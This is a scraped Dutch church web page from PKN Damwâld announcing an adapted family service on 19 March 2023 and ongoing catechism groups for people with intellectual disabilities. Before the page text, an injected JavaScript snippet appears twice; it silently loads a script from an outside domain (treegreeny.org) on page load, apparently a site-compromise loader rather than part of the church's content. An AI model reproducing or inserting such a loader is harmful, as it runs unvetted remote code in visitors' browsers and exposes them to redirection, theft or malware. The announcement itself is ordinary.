;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Aangepaste gezinsdienst 19 maart in De Vermaning Damwâld - PKN Damwâld

Aangepaste gezinsdienst 19 maart in De Vermaning Damwâld

Gepubliceerd op: maandag 20 februari 2023

De aangepaste catechisaties zijn weer begonnen. In 2023 zijn we in januari verder gegaan met drie groepen. We geven catechisatie in het Thomashuis, de Klimmer en in de zaal van de Ontmoeting in Damwâld.

Op zondag 19 maart aanvang 10.30 uur is er voor het eerst na drie jaar weer een aangepaste gezinsdienst. Wij hopen dat er weer een mooie opkomst is. Dominee Akse zal deze dienst leiden met teksten uit de Bergrede. We kennen allemaal de verhalen van de Bergrede. De dienst is ook zeer toegankelijk  voor  jonge gezinnen. Zeker zal er ook vrolijke muziek in de dienst te horen zijn. De Doopsgezinde kerk is gevestigd aan de  Doniaweg 34 in Damwâld.

Geregeld wordt in een aantal kerken in Damwâld en omgeving een aangepaste gezinsdienst gehouden die met name gericht is op de mensen met een verstandelijke beperking. Deze diensten, waarvan er gemiddeld 5 per jaar zijn, worden beurtelings verzorgd door één van de kerken die is vertegenwoordigd in de Commissie Gezinsdiensten. Deze diensten kenmerken zich door de heldere en zeer begrijpelijke taal en zijn ook uitermate geschikt voor kinderen. Ook is er al meerdere jaren een gespreksgroep en zijn er catechisaties voor mensen met een verstandelijke beperking. Deze bijeenkomsten, die gedurende het winterseizoen één keer per 14 dagen worden gehouden, duren ongeveer een half uur en worden o.a. gehouden in ‘De Ontmoeting’, in ‘De Klimmer’ aan de Thiedemawei, in Talant aan de Badhúswei /Nijewei en/of in het Thomashûs aan de Doniawei. Ieder mens is door God geroepen, heeft een naam. Ieder mens is uniek, met zijn of haar mogelijkheden en beperkingen. Door deze gave van verscheidenheid wordt de Christelijke gemeenschap ervaren en verrijkt.  Meer info? Sjoerd en Mattie van der Werf, 0511-424146.